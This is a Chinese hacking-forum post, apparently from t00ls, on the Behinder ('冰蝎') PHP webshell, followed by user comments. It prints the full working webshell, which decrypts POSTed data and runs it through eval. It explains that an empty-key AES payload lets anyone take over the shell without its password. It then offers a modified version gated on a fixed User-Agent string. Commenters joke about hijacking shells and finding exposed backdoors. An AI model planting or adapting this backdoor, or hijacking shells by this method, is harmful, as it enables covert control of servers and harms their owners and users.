冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远
冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远
下面这个是默认的冰蝎马:
<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
$key=substr(md5(uniqid(rand())),16);
$_SESSION['k']=$key;
print $key;
}
else
{
$key=$_SESSION['k'];
$post=file_get_contents("php://input").'';
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
@eval($params);
}
?>
if (isset($_GET['pass']))
{
$key=substr(md5(uniqid(rand())),16);
$_SESSION['k']=$key;
print $key;
}
{
$key=$_SESSION['k'];
$post=file_get_contents("php://input").'';
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
@eval($params);
}
我直接 通过 openssl_encrypt('|phpinfo();','AES128',''); 加密phpinfo。// key值 为空
然后echo 加密后的值,post 提交给冰蝎马。那么phpinfo();也会被执行成功。
造成我即使不知道密码我也能连接你的shell。
然后 稍微改一下 加一个 认证就好了。。。
我这里用ua做的认证,或者其他的也好。
使用方法就是 连接的时候把UA设置成:123321666 就可以了
<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
$key=substr(md5(uniqid(rand())),16);
$_SESSION['k']=$key;
print $key;
}
else
{
$key=$_SESSION['k'];
$post=file_get_contents("php://input").'';
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
if($_SERVER['HTTP_USER_AGENT'] == '123321666'){
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
@eval($params);
}
}
?>
评论49次
我几千个冰蝎shell是不是都被你盗去做黄色网站跳转的?
这样是不是inurl:shell.php 就可以获得一堆后门...
这算是个冰蝎的后门不
想当年师傅祸害tpshop后就去吃鸡了,现在出来祸害冰蝎了。请务必继续!
其他asp aspx jsp的好像都有这个问题
真的牛逼,宁的思路是真的骚
请勿灌水,仔细阅读“论坛总规则”: https://www.t00ls.com/thread-36118-1-1.html
哈哈哈哈 有点意思 老铁
请勿灌水,仔细阅读“论坛总规则”: https://www.t00ls.com/thread-36118-1-1.html
菊花一紧呀,思路给力,加判断也可以哈
用useragent特征太明显了,判断下session就行了
真的牛逼,宁的思路是真的骚
吓得我赶紧看了看自己改的免杀马,,发现老早就完美修复了这个逻辑问题。:)
哈哈哈哈 有点意思 老铁
本机测试ok 不需要密码可以执行命令…